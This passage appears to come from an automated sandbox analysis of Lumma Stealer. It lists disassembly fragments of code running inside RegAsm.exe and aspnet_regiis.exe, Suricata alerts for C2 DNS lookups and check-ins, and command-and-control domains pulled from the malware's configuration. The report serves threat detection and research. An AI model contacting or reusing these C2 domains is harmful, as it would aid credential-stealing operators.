                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]47_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx47_2_0043F150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax47_2_00407170
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]47_2_00441100
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h47_2_0044A1E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h47_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], ax47_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h47_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax47_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h47_2_0044A360
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_004473FA
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]47_2_00424390
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]47_2_004283A5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]47_2_004303B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]47_2_0043F479
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]47_2_0042F40F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_00443420
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah47_2_0044A4D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp47_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp47_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]47_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_0044A5E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]47_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]47_2_004206E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh47_2_00443870
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h47_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]47_2_0043A880
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]47_2_004468B9
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]47_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h47_2_00426910
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh47_2_004449F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]47_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, ecx47_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_004499B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [edi]47_2_0043EA30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h47_2_00415ADF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h47_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx47_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]47_2_0040DAB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx47_2_00426B80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh47_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh47_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx47_2_00449C10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]47_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]47_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]47_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]47_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_00428C90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]47_2_00404CB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]47_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]47_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]47_2_00405D10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, 0000000Bh47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al47_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]47_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh47_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h47_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax47_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h47_2_0041AF50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]47_2_00410F0F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]47_2_0042DFD6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh47_2_00443FA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp], 00000000h73_2_0039B000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h73_2_003C4040
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]73_2_003B00B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h73_2_003C80A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]73_2_0039508C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp+50h], 00000000h73_2_0039508C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], dx73_2_003A10D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]73_2_003A9140
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp+18h], 3602043Ah73_2_003AF1B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]73_2_003C518B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+00000688h]73_2_0039D1D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h73_2_0039F1D6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [edx+eax-01h]73_2_0038C210
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh]73_2_0038C210
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx73_2_003A7250
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx73_2_003A7250
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]73_2_00394294
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]73_2_003AD295
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]73_2_003AD295
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edx], ax73_2_003AA280
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp+34h], edx73_2_003812F2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al73_2_003B3335
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al73_2_003B3335
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]73_2_00396319
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi]73_2_003AA3A8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]73_2_003AA3A8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec ebx73_2_003BF3F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], dx73_2_003A14EA
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h73_2_003BF4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh73_2_003BF4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], dx73_2_003A14D3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]73_2_003AD4D4
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]73_2_003AD4D4
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]73_2_003AC510
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]73_2_00396574
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh73_2_003C7630
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al73_2_003B1670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al73_2_003B1670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al73_2_003B1670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al73_2_003B1670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al73_2_003B1670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al73_2_003B1670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al73_2_003B1670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+000000D0h]73_2_0039D672
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]73_2_003C16A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax73_2_0038A680
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebp, eax73_2_0038A680
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp al, 2Eh73_2_003AC6E1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]73_2_003AC6E1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+000000D0h]73_2_0039D733
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]73_2_003AB830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then xor eax, eax73_2_003AB830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+68h]73_2_003C7820
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]73_2_00396866
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax73_2_003AA8A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]73_2_00392920
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]73_2_00392920
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al73_2_00392920
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [003D1A70h]73_2_003AE927
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-000000C0h]73_2_0038F917
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]73_2_003BB9F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh73_2_003C9A10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]73_2_003ADA0A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]73_2_003AB830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then xor eax, eax73_2_003AB830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [003D042Ch]73_2_0039FB73
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h73_2_003C3B60
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]73_2_00384B50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h73_2_003ADB4B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]73_2_0039FBB1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh73_2_003C9BA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al73_2_003B3BFE
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al73_2_003B3BFE
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al73_2_003B3BFE
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al73_2_003B3BFE
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]73_2_003C6BE5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ebx73_2_003C8BE0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]73_2_00385C00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]73_2_0038FC00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]73_2_003C6C5A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h73_2_003A0C4C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h73_2_003C4C90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h73_2_003C9D20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh73_2_003C9D20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h73_2_003A7D03
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]73_2_003C3DA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp eax, C0000004h73_2_0039DDFF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [ebx+edx-06h]73_2_00386E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [edx+ebp]73_2_00386E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax73_2_00395E11
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]73_2_003AEE40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ebx73_2_003C8F50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h73_2_003A6FF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]73_2_0038DFC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]73_2_0038DFC0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.10:62005 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.10:63652 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.10:49520 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.10:65184 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.10:58599 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.10:51044 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.10:49789 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.10:51291 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.10:62402 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49719 -> 172.67.197.40:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49719 -> 172.67.197.40:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49726 -> 188.114.96.3:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49726 -> 188.114.96.3:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49733 -> 172.67.197.40:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49733 -> 172.67.197.40:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49728 -> 104.21.1.169:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49728 -> 104.21.1.169:443
                                Source: Malware configuration extractorURLs: agentyanlark.site
                                Source: Malware configuration extractorURLs: delaylacedmn.site
                                Source: Malware configuration extractorURLs: famikyjdiag.site
                                Source: Malware configuration extractorURLs: possiwreeste.site
                                Source: Malware configuration extractorURLs: explorationmsn.stor
                                Source: Malware configuration extractorURLs: commandejorsk.site
                                Source: Malware configuration extractorURLs: underlinemdsj.site
                                Source: Malware configuration extractorURLs: writekdmsnu.site
                                Source: Malware configuration extractorURLs: bellykmrebk.site
